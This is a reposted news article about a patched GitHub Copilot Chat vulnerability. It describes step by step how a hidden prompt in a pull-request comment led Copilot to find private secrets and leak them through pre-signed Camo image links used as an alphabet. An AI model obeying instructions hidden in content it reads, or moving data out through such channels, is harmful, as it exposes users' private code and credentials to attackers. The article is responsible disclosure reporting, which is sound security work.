Cybersecurity News Hub
No Result
View All Result
  • Home
  • Cyber Crime
  • Cyber Security
  • Data Breach
  • Mobile Security
  • Videos
  • Advertise
  • Privacy Policy
  • Contact Us
  • Home
  • Cyber Crime
  • Cyber Security
  • Data Breach
  • Mobile Security
  • Videos
  • Advertise
  • Privacy Policy
  • Contact Us
No Result
View All Result
Cybersecurity News Hub
No Result
View All Result
Home Cyber Security

GitHub Copilot Chat Flaw Let Private Code Leak Via Images

Cyberinchief by Cyberinchief
October 10, 2025
Reading Time: 4 mins read
0
GitHub Copilot Chat Flaw Let Private Code Leak Via Images


Artificial Intelligence & Machine Learning
,
Next-Generation Technologies & Secure Development

RELATED POSTS

How Russia’s Largest Private University is Linked to a $25M Essay Mill – Krebs on Security

Malicious Go Packages Impersonate Google’s UUID Library to Steal Sensitive Data

Warning: React2Shell vulnerability already being exploited by threat actors

Researcher Found Bug Could Exfiltrate Secrets Via Camo Images

Rashmi Ramesh (rashmiramesh_) •
October 9, 2025    

GitHub Copilot Chat Flaw Let Private Code Leak Via Images
Image: PJ McDonnell/Shutterstock

A now-patched flaw in GitHub Copilot Chat could have enabled attackers to steal source code and secrets by embedding hidden prompts that hijacked the artificial intelligence assistant’s responses. The exploit also used the repository platform’s image proxy to leak the stolen data.

See Also: OnDemand | Navigate the threat of AI-powered cyberattacks

The vulnerability, discovered by Legit Security researcher Omer Mayraz, combined a remote prompt injection with an inventive bypass of GitHub’s content security policy. It used Cam, the platform’s image proxying service, to pull private data out of repositories.

GitHub Copilot Chat is an AI assistant built into GitHub that helps developers by answering questions, explaining code and suggesting implementations directly in their workflow.

The flaw combined two issues: hidden pull-request comments and other content that Copilot read were not properly isolated or validated. The other was the way GitHub’s image proxy handled external images could be abused. By preparing signed image links and having Copilot assemble them, the researcher was able to turn a security feature into a channel for stealing data.

Buy JNews
ADVERTISEMENT

The researcher said he reported the issue through HackerOne. GitHub responded by disabling image rendering in Copilot Chat and says the vulnerability was fixed as of Aug. 14.

Copilot Chat’s usefulness stems from its context awareness. It reads repository files, pull requests and other workspace artifacts so it can tailor answers to a developer’s code. The researcher made Copilot “notice” an injected instruction by hiding a prompt inside a pull request description. GitHub supports hidden content through an official feature for comments. When the researcher moved the prompt into a concealed comment, the assistant still picked it up. The injected instruction affected other users who visited the pull request page, demonstrating that hidden prompts could influence Copilot responses for anyone who loaded the same context.

“Our research was limited to pull-request comments, which is an interface any developer on the planet can utilize against open-source projects,” said Liav Caspi, CTO and co-founder of Legit Security. “There might be other places where hidden prompts can be embedded, but the attack chain will be much harder for an anonymous actor.”

Once Copilot read the hidden instruction, the attacker could make it display messages, suggest fake code, or insert links and images in its replies. Since Copilot has the same access as the user running it, the hidden commands could tell it to search private code for sensitive information, turn that data into readable text and include it in its responses.

GitHub usually blocks web pages from loading images from unknown sites and routes any external images through its own proxy, Camo. When a user adds an external image, GitHub converts the link into a camo.githubusercontent.com address with a cryptographic signature, allowing only those signed links to be accessed. That setup stops outsiders from tricking a browser into fetching attacker-controlled content directly from a user’s session.

The researcher found a way around GitHub’s image protections by creating pre-approved image links for letters and symbols. He trained Copilot to use these images like pieces in a puzzle to spell out text. Each image linked to the researcher’s server, so when GitHub’s proxy loaded the images, it sent along the encoded data hidden inside them.

“Technically, yes,” Caspi said when asked if similar image proxies could be abused elsewhere. “The concept that was found is the ability to steal data by making the AI download images and encoding the message in the download requests. It is likely that it is possible to manipulate other AI systems in a similar way – ask the agent to perform a series of seemingly innocent tasks on sensitive input, which can leak that sensitive data to a threat actor.”

To actually steal data, the researcher converted pieces of private code into a simple text format and added them to the pre-approved image links. He also added random numbers to prevent caching. On their side, a basic web server sent back to invisible one by one pixel images, so nothing showed up in the user’s chat. As GitHub’s proxy fetched the images, it carried the encoded data, bypassing usual browser security rules.

The researcher proved the method could find specific secrets, for example, the token AWS_KEY, and send them out from private repositories. The attack could also manipulate Copilot for other users, showing formatted text, code and links that looked legitimate.

“Had it not been patched by GitHub, it is very likely this manipulation could be carried out by a threat actor without getting caught,” Caspi said. “The only caveat is that it can be used to steal a small piece of data, like a secret token or security issue, but not large-scale code theft.”

Caspi said that Copilot users can take basic hardening steps like reviewing data before sending and putting together configurations like proper ‘ignore’ files that deny access to sensitive files. But he added it is hard to protect against prompt injection and only network monitoring can eventually find out if the AI system is sending sensitive info to a third party.





Source link

Tags: ChatCodeCopilotFlawGitHubImagesleakPrivate
ShareTweetPin
Cyberinchief

Cyberinchief

Related Posts

How Russia’s Largest Private University is Linked to a $25M Essay Mill – Krebs on Security
Cyber Security

How Russia’s Largest Private University is Linked to a $25M Essay Mill – Krebs on Security

December 8, 2025
Malicious Go Packages Impersonate Google’s UUID Library to Steal Sensitive Data
Cyber Security

Malicious Go Packages Impersonate Google’s UUID Library to Steal Sensitive Data

December 8, 2025
Warning: React2Shell vulnerability already being exploited by threat actors
Cyber Security

Warning: React2Shell vulnerability already being exploited by threat actors

December 7, 2025
News brief: RCE flaws persist as top cybersecurity threat
Cyber Security

News brief: RCE flaws persist as top cybersecurity threat

December 7, 2025
Barts Health NHS Confirms Cl0p Ransomware Behind Data Breach – Hackread – Cybersecurity News, Data Breaches, Tech, AI, Crypto and More
Cyber Security

Barts Health NHS Confirms Cl0p Ransomware Behind Data Breach – Hackread – Cybersecurity News, Data Breaches, Tech, AI, Crypto and More

December 6, 2025
GOLD BLADE’s strategic evolution – Sophos News
Cyber Security

GOLD BLADE’s strategic evolution – Sophos News

December 6, 2025
Next Post
What it’s REALLY like working in Cyber Security

What it’s REALLY like working in Cyber Security

Covid-19 Vaccine Verification Status – Current Scams

Covid-19 Vaccine Verification Status - Current Scams

Recommended Stories

BENVENUTI ALLA CYBER CRIME DIVISION – GTA RP – GAMMA EP.2

BENVENUTI ALLA CYBER CRIME DIVISION – GTA RP – GAMMA EP.2

November 6, 2025
Website Hacking for Beginners | SQL Injection

Website Hacking for Beginners | SQL Injection

November 16, 2025
Jamf + Vanta for Seamless Security and Compliance

Jamf + Vanta for Seamless Security and Compliance

November 28, 2025

Popular Stories

  • Allianz Life – 1,115,061 breached accounts

    Allianz Life – 1,115,061 breached accounts

    0 shares
    Share 0 Tweet 0
  • Prosper – 17,605,276 breached accounts

    0 shares
    Share 0 Tweet 0
  • साइबर अपराध | Illegal Payment Gateway & Rented Bank Accounts | MAMTA CHOPRA

    0 shares
    Share 0 Tweet 0
  • Miljödata – 870,108 breached accounts

    0 shares
    Share 0 Tweet 0
  • Snowflake Data Breach Explained: Lessons and Protection Strategies

    0 shares
    Share 0 Tweet 0

Search

No Result
View All Result

Recent Posts

  • Top 5 Mobile App Security Threats Leaders Must Prepare for in 2026
  • Microsoft On Women In Cybersecurity At Black Hat Europe 2025 In London
  • Polisi kembali ungkap sindikat Cyber Crime kejahatan Internasional – iNews Malam 09/03

Categories

  • Cyber Crime
  • Cyber Security
  • Data Breach
  • Mobile Security
  • Videos

Newsletter

© 2025 All rights reserved by cyberinchief.com

No Result
View All Result
  • Home
  • Cyber Crime
  • Cyber Security
  • Data Breach
  • Mobile Security
  • Videos
  • Advertise
  • Privacy Policy
  • Contact Us

© 2025 All rights reserved by cyberinchief.com

Newsletter Signup

Subscribe to our weekly newsletter below and never miss the latest News.

Enter your email address

Thanks, I’m not interested